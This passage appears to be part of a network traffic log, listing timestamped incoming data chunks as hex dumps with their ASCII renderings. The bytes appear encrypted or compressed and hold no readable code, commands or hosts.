2022-11-07 22:49:05 UTC	7128	IN	Data Raw: 70 5d fc db 40 79 6a a2 fc 83 f2 78 1e 71 bb b8 ee bb 19 6d 0f 24 f4 4c 58 74 18 81 2d 51 66 ef f1 a7 1e aa 71 f9 ea 8a 39 6b 7f ac 60 ce 18 52 70 3a 1e 0b fb 46 d6 61 6a c7 ff 07 57 e5 c0 a9 ad 79 b6 06 3f 08 2f 5c 60 45 3a 63 07 0d 71 3d fc e2 51 79 52 61 ec eb 04 4d e7 f9 78 a3 a6 7b d8 14 05 05 7c c1 15 9c f6 83 0a 86 e8 15 04 0e 05 95 85 bd da b7 97 a5 2d 04 04 0a 1e a1 ee d3 0c d9 3e d0 db 12 11 19 07 d3 41 f6 24 f8 db fb 82 08 0d 18 11 e7 6d 15 21 09 97 1f 69 1c 0b 16 1b 09 31 20 09 3f 54 2c de 0e 19 13 1b 28 51 4b 03 45 b9 4d ad 1a 17 10 09 59 9a 6f 97 71 b1 63 f8 ed 69 6e 19 6f f0 28 6f 7d 5c 0f 62 3c ad 3f 88 6f 91 e5 00 c3 fe 8c 74 52 e5 a3 bf dc f3 78 78 51 c4 84 dd 7c 22 7c 9a 1f b0 6a d2 2e 21 93 fd 19 ac 01 50 17 ea 6e a0 a4 7d f5 72 3f 55 Data Ascii: p]@yjxqm$LXt-Qfq9k`Rp:FajWy?/\`E:cq=QyRaMx{\|->A$m!i1 ?T,(QKEMYoqcino(o}\b<?otRxxQ\|"\|j.!Pn}r?U
2022-11-07 22:49:05 UTC	7144	IN	Data Raw: 99 9c 40 60 60 dd c8 a2 79 63 ae 6f 04 51 37 fe d2 ee 0e 9e ef 3e 94 4c 47 27 8a e2 38 9e 8b 5f 38 4a d1 3b 1f 2b ab c6 85 6d 3c 91 d5 73 5d 8c dd f9 d2 5f d1 29 32 2c f5 f9 a4 23 28 c8 46 0e 08 7c d5 22 1e 77 b4 a3 7b 0a a0 74 10 a3 87 91 96 2b af 4b 36 e7 76 43 27 b8 17 bb a2 e2 60 64 30 69 a2 50 c8 c7 0d 9f e7 73 57 af b7 08 8b c2 9e cc 3e fb 5b 65 f1 60 30 5f fe 79 cc f4 76 c4 dc 08 bb a4 23 ab 3a 58 7c 6a 04 4b 88 12 db 72 af 03 a5 9a ce dc 7c f3 e9 57 79 4f c8 c3 76 83 96 47 02 6e 68 19 1d a7 95 8b 6d 7b 99 5d 60 fd a1 6b 98 9b 11 ce 74 60 9c 1f 2f 9b 9b be 40 62 43 69 dd 19 ec 6e 88 e7 53 19 6b 9d e0 7a 68 d1 75 b5 7b db 50 8a 6b 07 ea 42 fd 89 cc 99 99 bf 3a 19 86 a8 b4 6f 5c 30 c9 8c df 17 4e 73 a1 1e 87 8a 8f 12 91 c5 b7 06 8a 30 96 09 99 7e 4f Data Ascii: @``ycoQ7>LG'8_8J;+m<s]_)2,#(F\|"w{t+K6vC'`d0iPsW>[e`0_yv#:X\|jKr\|WyOvGnhm{]`kt`/@bCinSkzhu{PkB:o\0Ns0~O
2022-11-07 22:49:05 UTC	7160	IN	Data Raw: 4d 69 93 3e d4 90 2c 5c f4 da 76 91 c8 97 6c 85 79 78 8f ad 5e d7 95 59 a1 8c c7 a6 02 61 c9 2c 51 69 5a 4f 9c 41 6c b2 92 e3 5e 6f df 22 df c9 f6 e0 de 78 e7 99 94 2d 31 06 86 d6 a8 d7 c6 fc 80 e1 9f 96 c7 02 bb 9b d9 c5 ed 6e c7 16 82 8d 91 55 26 21 a3 61 74 71 a2 7c 24 a8 96 3c 04 0b 67 c9 8f 87 4d c4 29 3a 0d cd d8 d0 85 17 ba 05 4a 5d 23 ed 93 20 38 77 74 3f 9a 75 d5 8a 0f 6a d3 40 bf d3 e4 54 42 23 fc 96 7e 4a 66 41 e1 a5 69 8a 2f 10 f6 58 23 53 c2 05 79 0e be f7 89 71 aa bc 79 51 cd df 11 df d8 55 f9 80 0b ea 6d 3d 13 bd 8f 96 0a 99 6b ae b5 6c cd 7d ed 4f 4c 63 a8 8a 4e 53 31 9f 01 0a 87 45 e4 7a 98 ee 2c fd f1 4b a8 47 ae 96 95 78 02 fa 69 a7 9c 18 e3 c1 66 1b 6b 6f 60 c9 bc 9b 55 cb cc 70 96 3e 91 c0 82 5b 1e d1 92 b5 c0 1a 74 a6 15 d3 9c ae 40 Data Ascii: Mi>,\vlyx^Ya,QiZOAl^o"x-1nU&!atq\|$<gM):J]# 8wt?uj@TB#~JfAi/X#SyqyQUm=kl}OLcNS1Ez,KGxifko`Up>[t@
2022-11-07 22:49:05 UTC	7176	IN	Data Raw: 14 49 d0 a8 1f 76 2d 99 ca d5 61 fd bc 8b 12 9b b5 a6 ce 11 50 c2 47 5a 8b 86 86 a8 29 1e 3a 2b b2 dc a2 bb 6f d5 01 c3 63 4a 6c b7 88 d2 e6 c3 b7 ae 39 36 60 00 24 6c e8 44 c2 89 9c 9e 2a 2a df d4 1c 12 02 61 40 a9 a3 0e de e6 15 07 93 11 bf 7e 97 be f6 4d e7 b0 0b ac 86 88 2f 3d fa e6 b2 99 9a 2b e0 d7 0a fc db 7b ac 84 84 72 0d 3f 50 56 f2 f7 c6 34 95 92 8b 86 c7 43 f0 de 57 51 5d 8a 33 3b 77 69 55 8e e0 1d a7 86 89 b1 b4 e3 80 db 1d 47 ec c4 ce 2d b7 70 85 88 9c 9e ea 15 b9 6e d0 ec c7 a3 32 18 21 d5 d7 73 44 47 d9 1a e2 21 fa e4 04 08 43 df ba 43 fd b7 9c 9e 89 5c 34 5f f1 86 eb 89 d3 41 c6 f9 06 da d9 46 5b bc 30 1a dc 40 eb f4 c3 c4 11 a2 c4 24 a2 9e 89 94 81 92 17 9f 19 92 0b 8d 19 46 cd 65 a7 43 4d fd 91 6e d1 8d 61 13 ea 24 88 04 7d 88 9c 9e 09 Data Ascii: Iv-aPGZ):+ocJl96`$lD**a@~M/=+{r?PV4CWQ]3;wiUG-pn2!sDG!CC\4_AF[0@$FeCMna$}
2022-11-07 22:49:05 UTC	7192	IN	Data Raw: 93 65 a2 18 4d 64 ba 02 ec 7e e0 1c 2c 61 e4 d2 9f 79 52 f5 81 98 95 92 8b 72 fb 01 ae 61 49 3e 37 65 ea 31 73 64 1c dc 45 7f ff 02 f3 61 2a cf a8 7d f5 ed d7 6f 4f a2 bc 7f 88 18 99 6e 8e 6d e2 60 e6 1e 62 1a 45 c5 79 b7 71 90 d9 83 d6 b5 90 55 7b 96 0e 81 6b d9 bf 7d 2a 8d fc 60 33 90 e8 65 75 c6 77 78 8c 21 6c cd 06 6c ed 02 6f 90 39 d0 ca 8f 67 97 6b 49 79 9b 1f a3 5f 60 d9 bd a0 ca b5 ff 9e 90 93 8b 8c af 3b 6a b1 46 b6 77 fc fb 5d 6e 6b 71 e6 65 7a bc 6b 71 11 77 1a 6d da c3 70 72 f6 00 94 33 86 3e d6 65 ba 77 7a 6d 33 01 75 37 55 d1 6b 7a 12 7f 1b ea 23 9e 89 e0 98 6d 65 d3 26 6c bc 37 ec 52 38 d1 68 3e 63 29 7f 98 23 c9 65 d9 18 53 7e bb 09 51 79 4e 8c fa 64 7f a6 84 4f 9a 72 6d 84 ad 9b 91 99 97 de 8e 45 72 8c 2c ec 6f e2 7f 0a 7c 31 b0 c8 65 0a Data Ascii: eMd~,ayRraI>7e1sdEa}oOnm`bEyqU{k}`3euwx!llo9gkIy_`;jFw]nkqezkqwmpr3>ewzm3u7Ukz#me&l7R8h>c)#eS~QyNdOrmEr,o\|1e
2022-11-07 22:49:05 UTC	7208	IN	Data Raw: 06 ca 4e bc 18 6f 13 13 50 08 30 de 29 54 44 02 be d3 5a 2c 63 0e 32 69 70 5f 7a cd 7c aa 69 39 d6 c6 17 0c 0c 1f 41 40 11 0a a0 5d a0 0d 4c d4 50 65 72 01 ec f3 e9 50 de 4d 0c 9a d3 e1 03 d4 2f 20 58 cf 45 0a 26 7c ca 6c 99 4b 02 47 b8 45 c8 17 df 07 65 d7 e1 8c 04 3b ee 7a 25 bb 36 c4 06 08 cb 3c f8 bf be 3e 50 c6 90 0b 49 a0 0d 1f f9 ae 46 54 43 2e 52 cd 7c 4c 7e 32 c6 63 67 06 ba 03 e0 70 1e 25 b5 0c 68 53 5f 6e 70 49 34 f7 45 fa 10 bd 66 77 2c 4d 61 62 bb 72 ba 3e 06 9a 06 06 5d 1e 69 07 f2 17 5e f2 29 ea c9 69 af 62 1c 1e dd 65 64 09 db 5d 97 c6 cf 02 63 d0 d6 66 7c 49 cd 5a 01 25 e8 3b 46 fa 50 c2 ee d9 c6 56 5d d1 c2 34 4b d1 eb 4c 2c 86 15 22 b9 67 28 2f 37 7b bb 9e d7 f6 53 eb d5 2f 7e 6a 68 f7 00 12 15 54 7c 48 77 cf 6e 65 dd b0 26 3a 93 37 47 Data Ascii: NoP0)TDZ,c2ip_z\|i9A@]LPerPM/ XE&\|lKGEe;z%6<>PIFTC.R\|L~2cgp%hS_npI4Efw,Mabr>]i^)ibed]cf\|IZ%;FPV]4KL,"g(/7{S/~jhT\|Hwne&:7G
2022-11-07 22:49:05 UTC	7224	IN	Data Raw: 59 d0 93 1f ea fa 8d 2a 41 ac 52 c2 9e f2 a5 24 19 3b fe ba 61 53 21 a1 da 02 5d 5d a8 aa 8b c9 19 9f dc 5e 5e 3f 6d 5b 63 eb f1 57 22 63 c7 71 8e 52 10 1a 6e 9f 6f 66 22 d7 cd 7a 6d e4 68 85 84 7a 30 5d 86 0a 77 1a bb 9c 2a 81 70 bf d0 35 1e 3b f8 ab 3b 90 22 46 2a 7f d0 8f 76 97 80 39 20 db b9 f6 75 54 dd 77 7e 2d e0 e7 46 83 98 e3 85 0b b1 4a 42 09 ac 93 44 21 41 89 1d 7a 67 a7 c0 2c 46 40 e0 7c db bb 8a e8 60 50 6e df 6e 56 3f 1a 3e 4f e3 69 d6 8a 6f 07 3d 87 36 4a 88 94 a7 57 c7 26 c8 66 aa 3f a3 94 24 51 81 71 34 f3 cb 93 4e a7 0f 99 ec 32 84 00 d6 c1 ab ff 74 9f 5d bd a2 c1 3f 58 97 e1 22 22 7e 21 bd 47 c1 bb 66 6f a3 d4 82 b9 4c 4d d7 18 7b 45 cd f1 75 8a c8 b6 8d 5e 21 c3 ee 8a 55 d2 d9 ea 90 7a b7 5f ee d7 38 5d d2 c7 50 f0 1a ee f9 3c a3 44 96 Data Ascii: YAR$;aS!]]^^?m[cW"cqRnof"zmhz0]wp5;;"F*v9 uTw~-FJBD!Azg,F@\|`PnnV?>Oio=6JW&f?$Qq4N2t]?X""~!GfoLM{Eu^!Uz_8]P<D
2022-11-07 22:49:05 UTC	7240	IN	Data Raw: e5 7d df e0 bd 60 bc 9e d9 db 7b 90 4b 90 8b d9 12 dc d9 55 c6 68 65 6d ee c3 d2 5c 8c 9f 88 c4 eb 17 d4 f7 b4 2e c1 6b da 02 60 c0 16 0c 9c 9d 97 e2 b6 d5 c2 e0 c5 e2 5c 5d c9 78 93 47 f2 96 9d 94 8a e8 b3 8c 5c 48 39 c2 9b 5a c4 67 19 98 78 c7 cd 99 97 9c f5 3f 2b 76 99 1f de 7e 26 5b 7d da d0 00 f6 44 d3 98 75 43 b7 bb c6 c7 4b c7 a8 4b ff 45 13 e5 9d a6 f5 92 49 00 24 d4 e9 97 69 29 f8 86 98 8a a6 47 ee 2a d2 9e 3b dc c9 ae 76 c2 cf 3a d2 3b 6a 79 1d 19 78 b4 53 c7 6a d3 49 6a 0e 9d ab 40 13 6b 4a 6b ab 2e 80 4f c0 e3 15 f5 8c 98 02 9f ca c3 ac c0 46 cd 7c 3e fe 64 16 b9 a7 27 9f 11 d3 d4 86 45 df 51 82 e5 76 43 f1 91 30 8f 56 ad 45 12 cb c5 36 7f f2 6e 66 8f 80 c9 05 44 dc 94 91 96 9f f3 b1 ff 66 84 9f d3 b9 4e ce fa 3a f7 65 91 89 07 80 d7 c8 85 b6 Data Ascii: }`{KUhem\.k`\]xG\H9Zgx?+v~&[}DuCKKEI$i)G*;v:;jyxSjIj@kJk.OF\|>d'EQvC0VE6nfDfN:e
2022-11-07 22:49:05 UTC	7256	IN	Data Raw: 2d b6 03 5f 1a 0c 30 8f 61 7c 7f 15 33 d6 88 da 17 0e a7 1e 4f 1a 49 de dd 02 00 40 4d 94 fb 10 e7 12 88 63 3e af 3f 1f 49 90 3c b1 2e ef 02 f0 e1 42 66 18 17 3c 11 ae ca 88 95 6c 18 6b 17 10 31 91 be 7d a4 14 a5 da eb 9a 7f 15 e7 13 e9 7b 67 ba 7a 04 b7 02 89 76 73 f0 02 9e 18 7a ad 04 3a 66 03 4a a2 ea 03 58 bb 08 b1 15 a0 6d c7 82 6b 0e 0b 95 e1 6b 92 16 c3 02 81 b7 54 4f 0d 10 8d 14 9b 63 be 14 71 1f 9e 81 a2 6c 25 13 cc ac 30 f5 1f 1e 15 1c f4 10 97 32 92 0c 69 00 a9 d3 a4 5e 03 c9 1a 48 10 87 6a 8e 1f 2f b9 10 8f fe 03 7f 11 1e 72 97 e7 39 ad 02 ce 81 78 8e 41 10 51 08 03 1b a2 8c 6f 9c 3c 08 9f 9f eb 6b 04 08 53 0e 93 bc 5b c9 e3 16 7e 18 89 fa 04 1d 0d 16 1d 6e 82 be 60 00 17 3f 4d 01 8d 75 1d e1 02 30 a7 8d b6 2a 17 ea 21 11 97 12 02 54 1f 42 77 Data Ascii: -_0a\|3OI@Mc>?I<.Bf<lk1}{gzvsz:fJXmkkTOcql%02i^Hj/r9xAQo<kS[~n`?Mu0*!TBw
2022-11-07 22:49:05 UTC	7272	IN	Data Raw: fd c4 38 ae f9 6b 66 a4 39 d0 54 cb 58 55 49 63 30 2e f5 a0 2d 4e ce 07 94 ac 84 a3 c2 d0 26 52 45 72 70 61 35 47 85 ad 32 23 0c 5e dd 2a 66 16 04 9d 36 ee 20 26 1a 6e d5 da e2 61 53 22 f0 61 5b 79 b4 a8 49 e0 2b 26 22 a2 e0 e9 32 59 58 fa b6 de 70 6e f4 c6 a5 75 a5 69 f3 34 38 71 56 38 2b b8 4d 72 a0 62 71 22 21 11 64 c8 4c cf 48 54 51 cd d1 e6 2a 14 e2 18 fc 60 9e 4e 5f da 46 7f 3e e2 7b 1b 0b 6d 33 c1 03 47 4d 45 fd ed 38 37 5c 84 b8 c9 65 6e 85 ef 21 8b 0a 4f 66 07 61 32 71 57 38 32 c9 a2 31 6c 43 36 4b 32 e4 6e f5 09 e9 e9 c6 03 65 61 ff d8 08 19 6d 7c 88 3c bf 6c 20 6a 66 28 54 46 bd 55 72 68 39 ac 55 5a b8 7b 7c ed 0d 88 c9 c7 fa 6f 61 5f d5 d9 73 e8 17 0c 6c 88 c8 fe 1d 36 3d a6 73 1d 12 7d b9 4b 51 d7 78 c6 2c 23 e4 66 f7 6e d7 59 6f 31 08 08 36 Data Ascii: 8kf9TXUIc0.-N&RErpa5G2#^f6 &naS"a[yI+&"2YXpnui48qV8+Mrbq"!dLHTQ`N_F>{m3GME87\en!Ofa2qW821lC6K2neam\|<l jf(TFUrh9UZ{\|oa_sl6=s}KQx,#fnYo16
2022-11-07 22:49:05 UTC	7288	IN	Data Raw: ea 50 1a 38 1e 69 87 85 a0 37 7a 59 4c 60 4f c3 c8 eb bd 05 1c 40 5a 79 9a 4e eb 12 45 c9 38 5a 18 b7 2b 62 0c b9 b6 67 1c 93 56 32 57 50 d0 7d 62 79 c6 8d 5b 22 b0 33 24 4c e9 43 67 d2 7b 72 c1 71 41 4f 0d a1 7c 3a 49 74 40 5c 4c 2c 50 77 5e ad fc 1d 50 25 29 11 82 4d 4f af 83 6c f8 42 f6 13 6c 4b 25 60 5f a7 b8 75 54 d4 cf 59 9f 36 21 03 86 05 12 c3 5c 55 e2 06 5d 73 61 e2 eb 73 e0 b7 28 aa e7 f7 ac be 53 22 25 58 f4 2d 0d f7 2e 3d 28 4d 4c 1f 4c 5d b7 57 04 7c 9f 58 42 27 74 a3 74 1f 07 bb c6 cd 48 35 f4 26 3e 09 73 40 2a 4f a0 e3 3d 6f ab 47 51 95 7b 31 31 d9 3a 43 a7 a9 5e 51 89 ec 31 50 33 e1 22 46 51 c0 cf 57 40 73 43 4c 5d 1d 14 09 a0 98 70 11 2f 22 4a 68 b7 a5 58 68 77 45 ec 1e 82 46 45 4f e3 2a 5d 29 a9 19 10 67 37 07 5b 5c 50 b7 81 29 4a e7 64 Data Ascii: P8i7zYL`O@ZyNE8Z+bgV2WP}by["3$LCg{rqAO\|:It@\L,Pw^P%)MOlBlK%`_uTY6!\U]sas(S"%X-.=(MLL]W\|XB'ttH5&>s@O=oGQ{11:C^Q1P3"FQW@sCL]p/"JhXhwEFEO])g7[\P)Jd
2022-11-07 22:49:05 UTC	7304	IN	Data Raw: 9d b6 84 27 9d 7a 1b b8 d4 cc 99 91 9b b7 87 ac c4 b8 f8 be 92 f8 95 52 8b e6 79 76 1b b8 81 59 79 66 86 79 60 10 63 12 8a 61 d8 70 64 69 26 7c 06 76 3f 7a 03 1c 05 92 7b 07 7d 28 6c ff 73 0c bd 04 fa 79 1e 6a 33 62 65 7c 8d 11 da b1 ea e4 7f 82 8f 1a 64 28 95 62 5a a7 fb 19 3d 68 69 64 58 63 18 fe 76 b3 53 6e 65 78 65 b1 6d b6 0f 48 c1 6a 7c 69 73 6a d5 62 00 99 b4 c9 9d 6f 99 94 69 57 77 c4 35 00 7b 3b 75 ec 74 6f d9 67 fb f8 cf 48 4e 74 b3 68 f4 7f 0b ba a2 e9 bd 6e 68 78 59 66 a6 99 17 ae b5 70 35 8c 70 f1 73 37 6c c5 f3 42 c9 fa 7a 68 34 7a 0b 9d 95 01 92 6e 48 73 59 71 57 07 78 1f d7 39 0a 8c 7d 51 7c f7 63 4c 63 ae 75 52 b0 58 71 b2 68 a6 65 c8 0d 6c 0e f8 7b 66 c6 66 3e 71 83 e6 e3 ad 1b 71 67 57 66 ac 58 6a ab be 80 83 99 92 54 58 96 88 6c 1e 54 Data Ascii: 'zRyvYyfy`capdi&\|v?z{}(lsyj3be\|d(bZ=hidXcvSnexemHj\|isjboiWw5{;utogHNthnhxYfp5ps7lBzh4znHsYqWx9}Q\|cLcuRXqhel{ff>qqgWfXjTXlT
2022-11-07 22:49:05 UTC	7320	IN	Data Raw: f9 dc eb cb 6a 01 e3 d3 35 ca eb 9d dd 8c 9d 77 cf c8 5f da c3 99 ab ae cc 99 0f 05 98 a4 b1 44 af 76 b3 c3 bc 21 82 4b b7 bc ab bf 79 bb 76 a8 b1 98 06 b0 d3 b0 25 b4 af f6 c2 aa 0d d6 ab 64 b9 26 99 d7 82 40 89 9b 0c c8 84 18 81 77 90 ac 93 fa 9d da db bc 87 89 9b 88 66 84 5c 94 e9 9c bd f8 5b 1f 4e 9b 95 9b 81 84 99 d1 8b 04 8f f9 87 3a 71 63 d3 64 65 93 71 66 a0 1a 95 a9 71 96 6f 6f b7 73 4e 62 73 f7 a1 9e ac 93 69 93 68 5c 6b fa 65 3f 23 09 dd 7a 4b 60 e6 6c 7e 67 bf 86 10 ff 87 77 9a 4e 43 47 35 56 bf a7 bf a1 5e 5a 57 8c 5b 48 d3 70 b6 03 c3 56 76 46 0c 52 69 5e 59 5e e4 a5 0f 08 63 9c 43 1c 5f 41 5b d7 8d 4c c3 e8 ec f8 2d 48 96 2e 31 26 3e 98 ad 2f b8 1b 2f 66 84 33 2c 60 98 2b 0c c8 f9 b2 89 39 2a 7c 2d 2a 27 da b1 49 d2 8c 2d 76 22 a8 3e 2e 29 Data Ascii: j5w_Dv!Kyv%d&@wf\[N:qcdeqfqoosNbsih\ke?#zK`l~gwNCG5V^ZW[HpVvFRi^Y^cC_A[L-H.1&>//f3,`+9\|-'I-v">.)
2022-11-07 22:49:05 UTC	7336	IN	Data Raw: d7 ff fb 74 45 5a d6 2c 0c 77 c8 aa fd 24 df b5 a4 ed fd 7d 91 44 67 ab f1 60 4d 54 ce 89 fb ec 15 0b 36 b4 ac d7 d1 65 17 3c a2 e2 fe 20 d4 45 95 d3 69 54 eb c1 87 bf 69 8c 94 1e 65 2c fe 12 fb 06 b5 e9 f5 f7 2e 77 77 21 a9 0e 4b 5c ee d5 bc c9 9d fe 71 e9 28 21 fd c0 d4 d4 fe 6d bb f1 7e 5a 10 03 6c 5a a1 79 ff d5 a2 7a db 88 a4 a4 45 b8 fd cc 58 a5 57 43 e9 32 38 24 0a 43 1b 95 3b 3e 1e be 3d f5 c1 71 37 04 c9 59 c2 e1 48 46 35 90 bd fa 3f 0e 24 a1 49 89 94 3d 4e bb b2 af fe 72 15 20 dc a6 55 50 eb d5 89 47 8b 62 84 19 52 38 d4 d4 b1 c7 87 06 f0 e3 61 44 6e e4 eb d6 eb 5d ef de b3 32 81 74 17 87 4e 23 eb c1 c4 b8 05 4b 2d fd 3e 34 02 68 69 1e 74 93 e2 47 a2 b7 2b 4e 05 39 7c 22 c5 6d 4e f8 39 c9 6b 15 63 00 1b 73 3d f0 e1 bf 8c bd e8 e1 d4 8c fe 8f 8b Data Ascii: tEZ,w$}Dg`MT6e< EiTie,.ww!K\q(!m~ZlZyzEXWC28$C;>=q7YHF5?$I=Nr UPGbR8aDn]2tN#K->4hitG+N9\|"mN9kcs=
2022-11-07 22:49:05 UTC	7352	IN	Data Raw: 0b 1c 15 ed c3 21 f2 f7 fb 00 0e a3 80 3c 8b 0b a8 6b 33 bf 2d fd b5 f4 5e 80 86 88 b8 c1 70 14 94 c2 25 6c d4 20 7e 8d 7c 54 e3 88 24 87 e1 37 ec 8a cf 3c 1c 78 db d3 cd ff 62 e9 03 67 84 78 fc 32 01 f6 b7 2b 68 a0 3d 5b 55 91 5d 11 7f fa 08 5c 93 a7 53 cd 62 d8 24 c6 c6 df 41 b5 66 54 d9 c8 da 28 22 50 53 9b d8 3c a3 9c 64 ee f8 4c ff f9 1c 86 83 13 77 73 a2 52 b4 11 b6 9e 4b 6c 51 5b ba bc ff 4a 5e 1b ae ae de c3 75 8f 14 8c 87 ee c7 4d 9b 2a 7e 28 ab 43 ba 6d 55 75 fb 31 8c 99 60 54 4b 41 b6 80 87 8c 1b dd 60 a2 97 19 57 95 0a d9 5c 30 2e 11 b2 75 e2 ed fc e2 42 3c 8a 60 15 10 9e 90 bf 7a 14 6b 2e 68 e8 0d 8b b3 50 d0 66 19 7e 4f 8e ce e1 8e 8d 7f dc b8 68 95 15 d3 59 17 c8 e4 10 9a 88 75 c6 95 db aa b9 0b 99 77 0d 08 93 98 b4 1f 04 5c 36 0a b3 a4 5d Data Ascii: !<k3-^p%l ~\|T$7<xbgx2+h=[U]\Sb$AfT("PS<dLwsRKlQ[J^uM*~(CmUu1`TKA`W\0.uB<`zk.hPf~OhYuw\6]
2022-11-07 22:49:05 UTC	7368	IN	Data Raw: d9 1e 98 f6 57 a4 12 a9 04 13 dc d8 e0 cd e5 1e db 1b 8d 9a f5 ed eb 38 37 d0 a4 4a b2 65 e8 5c de 2c 47 07 c2 c1 94 d8 37 bd 64 9a 18 e8 5b 24 86 48 e2 6f 90 78 01 f0 49 93 af 88 a8 86 ef 1f 6a be 5f 95 c4 3c 53 6f 07 8c e9 d4 c6 16 5d 05 98 a3 d3 9b 13 9f 5d 29 08 72 70 06 fc 26 e3 41 9e 1a ad db 97 7c 16 87 c5 42 1b fd f2 92 61 ab 78 26 37 d3 6a 95 27 3d 66 46 4b 83 7d 54 9c 94 19 fb 8c 19 4c 2c 5b 19 cc 20 ab d1 e0 40 86 3d a5 a4 0e e6 12 07 14 29 8a 76 43 58 e4 30 e2 80 4e 16 ac d1 9e e3 e7 e8 96 65 2d c0 90 17 46 8c d6 af 70 df 93 98 ab 78 0a f9 9d d2 b5 f6 42 23 84 ad 06 5b c1 ad a3 a1 4b b6 94 1a 21 f3 93 a7 93 1c 4f fb 12 0d 14 9d 8b 06 0d 97 73 30 a0 be 38 1c 22 df 7f d8 76 de 5f 17 fa 8a a2 04 37 aa 52 88 21 64 d3 4f 66 89 74 e0 77 42 9c 1e b3 Data Ascii: W87Je\,G7d[$HoxIj_<So]])rp&A\|Bax&7j'=fFK}TL,[ @=)vCX0Ne-FpxB#[K!Os08"v_7R!dOftwB
2022-11-07 22:49:05 UTC	7384	IN	Data Raw: 0c 02 63 31 4e 9c b0 2e 76 cc 7c e3 2c 5c 7c cd 75 40 06 56 b8 98 95 7a ba 63 35 77 a1 3f 59 ee 5b e8 9c 24 45 6c 17 d4 be d3 52 6b de 00 46 6e c6 8e 06 7e ec b9 6e ea 0a 07 81 e2 d4 5a fb 91 d9 aa a8 28 e4 e4 91 b3 9b bd 2e 64 37 1f 46 62 e6 7f 66 9b 29 89 2b 2b 88 86 d6 35 ab 1f 55 68 2c 3f 06 3d 13 91 23 04 08 e3 e8 8c a4 0e a6 a8 8d 9e fb 4f d3 27 6b b1 da 5f 7e 72 80 4f 6e 15 18 fa f3 d8 72 b1 9c 6f 28 0c 07 ce 92 9f e3 89 e5 24 18 7d d3 ca dc 9d 31 38 78 d4 15 70 00 70 d8 6a 32 06 2f 27 71 39 1d b0 ec a3 0c 16 a8 f6 87 6a 08 b8 6b 82 7f 50 92 cd 46 33 62 42 8e 94 c1 6a ad 0c 33 29 ea 11 e8 d5 38 9a 59 4a 61 cd 90 b7 8f b7 79 06 3c af 5c 5d fe 04 00 5e 33 6a 3a 3e 3a fc 4a 19 ac 01 49 35 1a c0 62 33 3c 76 86 8a 41 1a 69 b6 dc 75 8a 97 68 d8 67 cd 9d Data Ascii: c1N.v\|,\\|u@Vzc5w?Y[$ElRkFn~nZ(.d7Fbf)++5Uh,?=#O'k_~rOnro($}18xppj2/'q9jkPF3bBj3)8YJay<\]^3j:>:JI5b3<vAiuhg
2022-11-07 22:49:05 UTC	7400	IN	Data Raw: 3a 73 48 d2 52 7b 49 e6 6f 08 2f cd d6 23 cd 8c 17 43 cf 5b 4e 99 6a 68 2c de a8 52 03 96 ac 13 57 e0 18 80 b5 70 79 c7 27 42 f1 92 b6 26 e6 8c 5b d4 20 23 66 da 84 8b 8b 06 ca 49 cb 06 fc c0 a6 21 e3 c2 15 b2 3a 6e 14 9b 17 b5 69 97 11 66 60 5f 78 40 53 7f ab 37 35 d4 1f 60 d6 57 1c 92 51 9c 87 27 f7 43 78 a8 64 a5 f1 7d 45 d8 df cf 6e aa 84 56 5a cf 00 07 23 44 ff 71 12 a7 ec 1b 99 96 63 c6 d0 9a c0 05 fb 51 21 9f 2e c6 6f 65 5c 13 4e 8e ad a2 04 e4 6e a3 21 81 7b 31 00 68 9c 16 c3 c6 c3 08 5a 48 57 b1 d4 ff 50 a3 94 6c fb 3a 84 1d 73 e1 e8 93 d2 3f 79 74 4a d0 f0 6d 64 1f 3e ab 9f 90 75 d4 d1 56 6d f2 d7 6b cc 87 50 d4 64 87 08 09 50 7f 2c 75 44 27 35 da 88 43 aa b1 d8 87 8e 25 91 f3 cc 1e a3 52 c3 6d 15 2b 38 7e 60 db 01 2d 7b fd f4 93 bf bb a5 b5 89 Data Ascii: :sHR{Io/#C[Njh,RWpy'B&[ #fI!:nif`_x@S75`WQ'Cxd}EnVZ#DqcQ!.oe\Nn!{1hZHWPl:s?ytJmd>uVmkPdP,uD'5C%Rm+8~`-{
2022-11-07 22:49:05 UTC	7416	IN	Data Raw: 3d 5f 6f 86 c8 90 13 3f f8 fb bb 34 58 f1 8c 7f b5 2d b3 a4 9b 93 c9 18 f3 9b 15 41 38 e2 3e 1c 18 a7 73 fa 48 ab 8a 39 80 8c 7b 50 f6 fa 25 a0 95 51 82 0d 87 10 d4 5a 71 59 56 a4 d5 0a a9 5b d8 78 fe 0a 5c 3f 6c 35 c4 ff 1a db 6a 95 40 00 d7 60 83 8e 58 80 0d 55 3d 23 61 87 e1 31 d7 dd 06 df 63 74 9e 90 2a 72 05 81 a5 8e 45 fe 30 2e db 77 aa 5f 4e 5b 37 32 93 86 9f 40 b8 83 99 d5 4e c6 74 c5 30 6f 0e 38 40 39 81 41 fe 9a 57 a7 13 43 ab 9a 3d 23 38 74 60 ed 81 54 3f 03 08 51 2f b7 48 76 25 d9 93 bb 0f 6b f7 00 80 35 15 fe 64 0e 62 76 4a f9 b6 94 a5 ee 88 89 52 8b c9 16 bd 05 78 6e bd 03 52 54 59 8f 39 0a 6e 3c fc 86 6c 96 b5 fe b3 4b 92 d4 9b 15 14 31 dd 18 67 cb d6 64 78 45 48 97 c4 1e 1a 8e 9b 97 37 02 f2 23 5b a3 1b 19 b4 8a 1a 25 dc d7 0b c5 9c de 1b Data Ascii: =_o?4X-A8>sH9{P%QZqYV[x\?l5j@`XU=#a1ct*rE0.w_N[72@Nt0o8@9AWC=#8t`T?Q/Hv%k5dbvJRxnRTY9n<lK1gdxEH7#[%
2022-11-07 22:49:05 UTC	7432	IN	Data Raw: 21 c1 72 e7 be c9 bc 75 d0 6c 3b b1 c7 41 6d f6 67 aa 37 cd 66 22 75 f2 ab 43 6f 74 21 7e 29 3b 72 63 68 a7 7e eb ce 34 fa ac 7b d1 8e 47 7f ec f8 75 a2 3e 80 15 2f 38 18 bd bb 44 96 9e eb ab d4 0b ae de 58 84 3f d3 30 38 6d 20 b7 43 cd 01 91 8a 65 c1 4c e9 60 7a 1e 85 7c 20 29 42 48 39 84 84 c7 90 2a a1 f3 73 18 bd 4a d9 69 f2 94 e4 5c f3 76 1b 87 98 45 97 8b 0c 1c 09 b1 40 df 01 76 97 f7 5a f7 2d b2 a7 3c ea 23 f7 08 dd 50 0e 69 83 04 9a 9a 98 b1 bc 03 07 ce 53 fd 6d 57 0a cd 25 8f 7a 8f 1d ad 57 44 89 0c 7e 47 2c 73 3a 57 8a 25 e1 92 ce 47 27 90 5c bf d7 8d 7b 8b 83 a2 38 58 72 5a 9c 93 9b ff b1 76 a3 28 bc 1c 8a e6 78 f3 d7 